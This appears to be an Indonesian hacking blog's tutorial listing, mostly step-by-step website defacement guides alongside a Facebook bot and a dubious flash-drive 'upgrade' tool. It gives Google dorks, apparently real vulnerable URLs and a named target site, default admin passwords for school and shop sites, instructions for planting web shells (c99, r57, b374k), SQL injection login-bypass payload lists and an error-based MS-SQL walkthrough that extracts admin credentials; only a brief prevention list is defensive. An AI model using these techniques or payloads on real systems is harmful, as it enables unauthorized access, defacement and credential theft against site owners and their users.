Tampilkan postingan dengan label TUTORIAL. Tampilkan semua postingan
Tampilkan postingan dengan label TUTORIAL. Tampilkan semua postingan

Selasa, 01 Oktober 2013

Cara Membuat Bot Facebook







Kali Ini Saya Akan Share Tentang Bot Facebook,Ya Gk Perlu Panjang Lebar Karena Ane Males Post,Gk Tau Bot Facebook Cari Di Mabh Google Gk Tau Link Mbah Google Klik Disini

Langkah-Langkah Mengaktifkan Bot

Pertama-tama buat sebuah web hosting yang support PHP dan Cronjobs, ada beberapa web hosting anda tinggal pilih, bisa search di google "Web hosting support PHP", 
                               
Setelah membuat web hosting tadi, (sebagai contoh cPanel) , Selanjutnya silahkan download script auto comment+like facebook versi terbaru Silahkan Download 
Buat Akun Cronjob Di webbasedcron.com lalu Register

Goodluck

NB : Jika Tdk Tau Di Mohon Comment 

Creew : By ImronX - Gen

Upgrade Flashdisk 1GB Menjadi 2GB







Gw Dah Kabar Baik Nihh Om FlashDisk Gw Pertama 1GB Jadi 2GB Kok Bisa Ya??Wkwkwk Nih Gw Kasih Tutorial Cara Upgrade Flashdisk 1GB To 2 GB Langsung Saja

1).Download Om Toolsnya Di Sini

2).Masukin Om Flashdisknya Gk Bisa Masukin Inbox Ane Wkwkwk

3).Buka Toolsnya Lalu Klik Fix

4).Cabut DDan Colokin Lagi Flashdisknya

5).Teteretetet Jadi 2GB Kan



Silentum Uploader Upload Vulnerability




ssalamualaikum...Hari ini saya nak ajar cara deface dengan mudah dan cepat, bagi newbie yang baru nak belajar deface memang sesuai untuk menggunakan cara ini dulu...
ok let's go
Dork : Inurl:upload.php intext:"htm html" site:.com / org / net etc
            Intext:Powered by: Silentum Uploader

File yang dibenarkan hanyalah yang seperti berikut: .doc, .htm, .html, .odt, .pdf, .rtf, .sxw, .txt and etc

Demo All Website Vuln


http://bn.thedocumentsguy.com/upload.php

http://site.foilgraphicsgifts.com/upload.php
http://www.thiagocavaleiro.com.br/site/upload.php
http://site.foilgraphicsgifts.com/upload.php
http://site.foilgraphicsgifts.com/upload.php
http://www.webstyling.it/script/php/upload/3/upload.php
http://www.hiphopcars.com/black_models_divas/upload.php
http://actorsal.com/upload.php

Cara Tebas Index WordPress





Woi Kali Ini Saya Share Tutorial Cara Deface Index Website Wordpress :v :p Langsung Saja Ya Om Saya Males Nulis Capek 

1).Login Dulu Om Klo Gk Login Gimana Mau Nebasnya Wkwkwk :D


2).Ke Appearance => Editor

 

















3).Masukin Shellnya Truss Klik Edit

4).Lalu Kalo Sudah Buka Dengan Cara http://site.com/wp-content/themes/twentytwelve/namafile.php

5).Eksekusi Dehh Cari Index.php nya Di Public html

Selamat Menebas

Cara Deface Mudah Dengan (WebDav)



Cara Deface Website Dengan Webdav Shell Maker | Hmei7


Ok deh langsung saja ke inti postingan kali ini, o'ya! disini saya hanya memberikan tutorial untuk pembelajaran. Bukan sok2'an jadi heker, cracker, ceker atau apalah, saya hanya ingin berbagi karena Berbagi Itu Indah 

Dengan menggunakan sebuah tools hacking buatan Hmei7 kita dapat dengan mudah menanam shell ke dalam sebuah website, dan dengan begitu kita dapat melakukan apa saja terhadap web yang kita tanami shell tersebut.

WebDav Shell Maker : Download Disini
Password : garudacyberattacker

1). Download kemudian extract file
2). Buka tools webdav yang sudah di download tadi, klik menu tab 'WebDav' lalu pilih 'Asp shell maker'.




3).Selanjutnya, pilih Add site, disini saya menggunakan target http://www.beijinggym.com/ lalu klik OK.



4)Jika Sudah Klik Serang :v



5).Jika Succes Akan Keluar Seperti Dan Buka Link Tersebut





6).Lalu Cari File Index.php/Index.html Tekan CTRL+F Biar Lebih Gampang




7).Lalu Masukin Dehh Script DefaceNya Dan Klik Kaydet



8). Buka Defacan Ente Dengan Cara :
http://Target Kamu.com/index.php

NB: Matikan AntiVirus Sebelum Mengguakan WebDav Karena Anti Virus Anggap WebDav Sebagai Virus 



Cara Deface Website sch.id




Tutorial Deface Website .sch.id




Deface adalah hal yang sudah biasa dilakukan mungkin, dan mungkin tutorial deface yang satu ini tidak layak tapi tidak ada salahnya untuk Berbagi Ilmu .. Dan kita bisa mendeface index websitenya secara langsung ..

Tutorial Deface Index Website .sch.id : 

1. Pergi ke google.co.id, Tuliskan dorknya :

inurl:sch.id" intext:"tim balitbang" intext:"sdn"

Tutorial Deface Index Website .sch.id

2. Pilih salah satu website
3. Setelah mendapatkan websitenya, gunakan exploit :  /member/index.php 

Tutorial Deface Index Website .sch.id

4. Silahkan coba login dengan user dan password defaultnya :

User :    | Password :

Admin : 123456
Kickdody : 123456
Siswanto : 123456
Alumni : 123456
Alan : 123456
Tomi : 123456

5.  Nah kalau tidak bisa login, silahkan cari website lain.. intinya jangan menyerah mereka yang berhasil adalah mereka yang terus mencoba Dan Di Dunia Hacking Tdk Ada Yg Instan..

6. Nah jika sudah berhasil silahkan dieksekusi deh tuh website.. Jika ingin menanamkan shell  tinggal ke sim > data laporan > tambah laporan dan web tersebut sukses terdefaced

NB: Tdk Semua Web Bisa Di Deface Bro Jadi Harap Sabar Dan Teliti


Deface Website Dengan Teknik Upload File Di SHOP737





Saya Akan Mengajari Tutorial Deface Dengan cara teknik tersebut ..
Tanpa Basa Basi ..
Langkah :
1.Buka Om Google Masukin Dork : intext:"Powered by Shop737"
2.Buka Salah Satu Website Yang Anda Dapat Dari Hasil Dorking >.<
3.setelah anda buka , anda masukan exploit : url/poto/upload.php | example : livetarget.com/poto/upload.php
4.Kalau Diminta ID Dan Password , isikan :
username : admin
password: admin
5.Kalau Anda Tidak Berhasil Login Menggunakan Username dan Password diatas >.< , silahkan cari web yang lain >.< , kalau berhasil anda tinggal upload file yang format txt atau image >.< dengan cara di foto berikut :


___________________________________________________________________________________ 
penjelasan :
Nomor :
1.Untuk membuat kategori , masukan saja disitu nama kategori yang anda ingin buat
2.Untuk Membuat Kategori , nama kategorinya di nomor 1
3.Pilih Kategori , jadi kita upload file ke kategori tersebut >.<
4.Masukan File Sobat , dengan format txt atau image
5.Kirim File Sobat Ke Website Tersebut >.<
___________________________________________________________________________________

6.Jika Sobat Berhasil Upload file sobat , sobat dapat membuka nya dengan format : url/foto/(kategori yang sobat pilih)/namafilesobat | example : livetarget.com/foto/indonesiahere/riel404.txt

Sekian Dari Saya >.<

Shell Beberapa Versi









Shell ini bisa dikatakan sebagai file manager kedua yang bisa merubah maupun menghapus isi dari web. Kebanyakan para hacker/defacer menanamkan sebuah shell ke web target untuk merubah tampilan index webnya dengan script deface mereka. Karena setelah menanamkan sebuah shell ke web, anda tidak perlu masuk ke cpanel web tersebut. Cukup anda tanam shell itu ke tempat upload cms web target dan buka shell anda. Anda rubah index.php dengan script deface anda, maka web tersebut akan berubah.

Saya akan membagikan beberapa shell yang sering digunakan para defacer untuk mengeksekusi target mereka.

Download Shellnya Disini


Password Lihat Disini

Di dalam file rar tersebut terdapat 5 shell, yaitu :
1. Shell 1n73tion (karya X'Inject)
2. Shell B374K
3. Shell Blackshadow (karya Billy Sinuraya)
4. Shell c99
5. Shell r57

terserah anda mau gunakan yang mana, jika ingin menggunakannya pakai 1 saja. Jangan di upload semua :v  Uplod Semua Juga Gk Papa Yg Penting GREGET

Semoga bermanfaat  ^_^


Deface Website Dengan sql Injection




SQL Injection adalah memasukkan kode-kode SQL untuk mendapatkan akses ke database yang lebih besar daripada yang seharusnya kita dapatkan, terutama pada script yang tidak memvalidasi input dari user.

SQL Injection sebenarnya sudah sering dibahas dimana-mana, tetapi ternyata masih banyak webmaster yang belum tahu atau tidak peduli akan kelemahan ini.



Apa saja yang diperlukan untuk melakukan SQL Injection ?
1. Internet Explorer
2. PC yang terhubung ke Internet

OK, langsung saja kita praktekkan, check this out :

Pertama bukalah [link ini] atau (mbah google) untuk mencari script yang terhubung ke database. Masukkan salah satu keyword di bawah ini (lengkap dengan tanda petiknya) :
"/admin.asp"
"/login.asp"
"/logon.asp"
"/adminlogin.asp"
"/adminlogon.asp"
"/admin_login.asp"
"/admin_logon.asp"
"/admin/admin.asp"
"/admin/login.asp"
"/admin/logon.asp"
"/admin/adminlogin.asp"
"/admin/adminlogon.asp"
"/admin/admin_login.asp"
"/admin/admin_logon.asp"
"/administrator/admin.asp"
"/administrator/login.asp"
"/administrator/logon.asp"
"root/login.asp"
"admin/index.asp"

Anda bisa menambahkan daftarnya berdasarkan kreatifitas Anda sendiri. Bukalah salah satu link yang ditemukan oleh google, kemungkinan Anda akan menjumpai sebuah halaman login (user name dan password).

Masukkan kode-kode berikut,
User name : ` or `a'='a
Password : ` or `a'='a
(termasuk tanda petiknya)

Jika berhasil, kemungkinan Anda akan masuk ke admin panel, di mana Anda bisa menambahkan berita, mengedit user yang lain, merubah about, dan lain-lain. Jika beruntung Anda bisa mendapatkan daftar kredit card yang banyak.

Jika tidak berhasil, cobalah mencari link yang lain yang ditemukan oleh google. Menurut pengalaman saya, dari sekitar 20 link yang saya coba, ada dua atau tiga yang berhasil di ahir 2011.

Banyak variasi kode yang mungkin, antara lain :
User name : admin
Password : ` or `a'='a

Di bawah ini bisa dimasukkan baik ke user name maupun password :
' or 0=0 --
" or 0=0 --
or 0=0 --
' or 0=0 #
" or 0=0 #
or 0=0 #
' or 'x'='x
" or "x"="x
') or ('x'='x
' or 1=1--
" or 1=1--
or 1=1--
' or a=a--
" or "a"="a
') or ('a'='a
") or ("a"="a
hi" or "a"="a
hi" or 1=1 --
hi' or 1=1 --
hi' or 'a'='a
hi') or ('a'='a
hi") or ("a"="a

Anda masih bisa memperpanjang daftarnya sesuai kreatifitas Anda.

Hacking adalah seni. Hacking adalah perpaduan dari pengetahuan, kreatifitas dan kesabaran. Jika Anda memiliki ketiga-tiganya Anda akan berhasil.

=======================================================
Hingga Des 2011, masih saja terdapat situs web di Republik Indonesia yang dibobol dengan teknik SQL Injection. Anda tahu betapa berbahaya bug yang satu ini ? Berikut akan kita sajikan step by step SQL Injection ini yang diambil dari langsung tulisan Mr.X
Catatan : kita akan membatasi bahasan pada SQL Injection di MS-SQL Server.

silahkan ambil contoh sebagai percobaan di situs google (usahakan milik situs yang gak terkenal dl buat percobaan)

Langkah pertama, kita tentukan lubang mana yang bisa di-inject
dengan jalan berjalan-jalan (enumeration) dulu di site tsb.
Kita akan menemukan 2 model cara input parameter, yaitu dengan
cara memasukkan lewat input box dan memasukkannya lewat
alamat URL.

Kita ambil yang termudah dulu, dengan cara input box.
Kemudian kita cari kotak login yang untuk admin.
Langkah pertama untuk menentukan nama tabel dan fieldnya,
kita inject kotak NIP dengan perintah (password terserah, cabang
biarkan aja):
' having 1=1--
jangan lupa untuk menuliskan tanda kutip tunggal dan tanda
minus dobel (penting).
Arti kedua tanda tsb bisa anda cari di tutorial SQL Injection
Kemudian akan keluar pesan error:
--------------------
Microsoft OLE DB Provider for ODBC Drivers (0x80040E14)
[Microsoft][ODBC SQL Server Driver][SQL
'T_ADMIN.NOMOR' is invalid in the select list because
it is not contained in an aggregate function and
there is no GROUP BY clause.
/sipm/admin/dologin.asp, line 7
--------------------
Keluarlah nama field pertama kita !!!
Catat nama tabel : T_ADMIN
Catat nama field : NOMOR

Kemudian kita akan mencari nama field-field berikutnya, beserta nama tabel yang mungkin berbeda-beda. Kita inject di kotak NIP (password terserah):
' group by T_ADMIN.NOMOR having 1=1--
Akan keluar pesan error:
--------------------
Microsoft OLE DB Provider for ODBC Drivers (0x80040E14)
[Microsoft][ODBC SQL Server Driver][SQL Server]Column
'T_ADMIN.NIP' is invalid in the select list because
it is not contained in either an aggregate
function or the GROUP BY clause.
/sipm/admin/dologin.asp, line 7
--------------------
Artinya itulah nama tabel dan field kedua kita.
Catat : T_ADMIN.NIP

Kemudian kita cari field ke tiga :
' group by T_ADMIN.NOMOR,T_ADMIN.NIP having 1=1--
Akan keluar pesan error:
--------------------
Microsoft OLE DB Provider for ODBC Drivers (0x80040E14)
[Microsoft][ODBC SQL Server Driver][SQL Server]Column
'T_ADMIN.PASSWORD' is invalid in the select list because
it is not contained in either an aggregate
function or the GROUP BY clause.
/sipm/admin/dologin.asp, line 7
--------------------
Catat field ke tiga : T_ADMIN.PASSWORD

Lakukan langkah di atas sampai kita menemukan field terakhir.

Berikut adalah pesan error yang terjadi, jika kita mengecek
field terakhir dengan meng-inject:
' group by T_ADMIN.NOMOR,T_ADMIN.NIP,T_ADMIN.PASSWORD,
T_ADMIN.NAMA,T_ADMIN.KD_RANTING,T_ADMIN.ADDRESS,T_ ADMIN.EMAIL
having 1=1--
(catatan : kalimat harus 1 baris, tidak dipotong)
--------------------
- NIP atau Password atau Unit Anda salah !! -
--------------------
Sukses !!! Kita berhasil menemukan field terakhir.
Daftar kolom (field):
T_ADMIN.NOMOR
T_ADMIN.NIP
T_ADMIN.PASSWORD
T_ADMIN.NAMA
T_ADMIN.KD_RANTING
T_ADMIN.ADDRESS
T_ADMIN.EMAIL
Hanya ada satu tabel untuk otentifikasi ini (yaitu T_ADMIN), ini akan mempermudah proses kita selanjutnya.

Langkah berikutnya, kita menentukan jenis struktur field-
field tersebut di atas.

Kita inject di kotak NIP (pass terserah) :
' union select sum(NOMOR) from T_ADMIN--
Arti dari query tersebut adalah : kita coba menerapkan klausa sum sebelum menentukan apakah jumlah kolom-kolom di dua rowsets adalah sejenis.
Bahasa mudahnya adalah kita memasukkan klausa sum (jumlah) yang berlaku untuk type kolom numerik, jadi untuk type kolom yang bukan numerik, akan keluar error yang bisa memberitahu
kita jenis kolom yang dimaksud.
Pesan error :
--------------------
Microsoft OLE DB Provider for ODBC Drivers (0x80040E14)
[Microsoft][ODBC SQL Server Driver][SQL Server]All queries in an SQL statement containing a UNION operator must have an equal number of expressions in their target lists.
/sipm/admin/dologin.asp, line 7
--------------------
artinya kolom NOMOR berjenis numerik.

Berikutnya kita inject :
' union select sum(NIP) from T_ADMIN--
Akan keluar pesan error :
--------------------
Microsoft OLE DB Provider for ODBC Drivers (0x80040E07)
[Microsoft][ODBC SQL Server Driver][SQL Server]The sum or average aggregate operation cannot take a char data type as an argument.
/sipm/admin/dologin.asp, line 7
--------------------
Artinya kolom NIP bertype char.

Kita harus mengulang perintah di atas untuk kolom yang berikutnya dengan jalan mengganti nama_kolom di :
' union select sum(nama_kolom) from T_ADMIN-- dengan kolom yang berikutnya. Kita peroleh 7 type kolom:
T_ADMIN.NOMOR => numeric
T_ADMIN.NIP => char
T_ADMIN.PASSWORD => nvarchar
T_ADMIN.NAMA => char
T_ADMIN.KD_RANTING => char
T_ADMIN.ADDRESS => nvarchar
T_ADMIN.EMAIL => char

Langkah berikutnya, kita akan mencari isi kolom password, untuk user admin, dengan meng-inject :
' union select min(NAMA),1,1,1,1,1,1 from T_ADMIN where NAMA > 'a'-- artinya kita memilih minimum nama user yang lebih besar dari 'a'
dan mencoba meng-konvert-nya ke tipe integer.
Arti angka 1 sebanyak 6 kali itu adalah bahwa kita hanya memilih
kolom NAMA, dan mengabaikan 6 kolom yang lain.
Akan keluar pesan error :
--------------------
Microsoft OLE DB Provider for ODBC Drivers (0x80040E07)
[Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the varchar value 'bill ' to a column of data type int.
/sipm/admin/dologin.asp, line 7
--------------------
Anda lihat :
varchar value 'bill '
'bill' itu adalah nama user di record yang terakhir dimasukkan, atau isi kolom NAMA di record yang terakhir dimasukkan.

Selanjutnya kita inject :
' union select min(PASSWORD),1,1,1,1,1,1 from T_ADMIN where
NAMA = 'bill'--
catatan : harus sebaris (tidak dipotong).
Akan keluar error :
---------------------
Microsoft OLE DB Provider for ODBC Drivers (0x80040E07)
[Microsoft][ODBC SQL Server Driver][SQL Server]Syntax
error converting the nvarchar value 'm@mpusk@u' to a
column of data type int.
/sipm/admin/dologin.asp, line 7
---------------------
Artinya kita berhasil !!!
Kita dapatkan
[+] NAMA = bill
[+] PASSWORD = m@mpusk@u


Kita inject-kan :
' union select min(KD_RANTING),1,1,1,1,1,1 from T_ADMIN
where NAMA ='bill'--
catatan : harus satu baris.
Duarrrrrr..........
Glhodhak.............
Langsung masuk ke menu admin.
Ingat : jangan buat kerusakan ! beritahu sang admin !!!

Lubang ke dua adalah pada bagian berita.
Pada dasarnya berita di situ adalah isi dari tabel yang lain lagi. Jadi tetep bisa kita inject !!!
Bedanya, kita harus memasukkan parameter di alamat URL-nya.


Kita

Nah, selanjutnya adalah tugas anda sendiri untuk mengembangkan pengetahuan anda.
Anda bisa men-insert berita yang bisa anda tentukan sendiri isinya. Inilah mengapa hole di MS-SQL Server ini demikian berbahaya.

Perkiraan saya, nama-nama partai di situs KPU yang di-hack oleh Shizoprenic, juga ada di tabel-tabel suatu database, jadi tetep bisa dimasuki dengan cara SQL Injection ini.


************************************************** ****
KHUSUS BUAT ADMIN & WEB PROGRAMMER !!!
************************************************** ****
Cara pencegahan yang umum digunakan :
1. Batasi panjang input box (jika memungkinkan), dengan cara membatasinya di kode program, jadi si cracker pemula akan bingung sejenak melihat input box nya gak bisa di inject dengan perintah yang panjang.
2. Filter input yang dimasukkan oleh user, terutama penggunaan tanda kutip tunggal (Input Validation).
3. Matikan atau sembunyikan pesan-pesan error yang keluar dari SQL Server yang berjalan.
4. Matikan fasilitas-fasilitas standar seperti Stored Procedures, Extended Stored Procedures jika memungkinkan.
5. Ubah "Startup and run SQL Server" menggunakan low privilege user di SQL Server Security tab.

Postingan Lama Beranda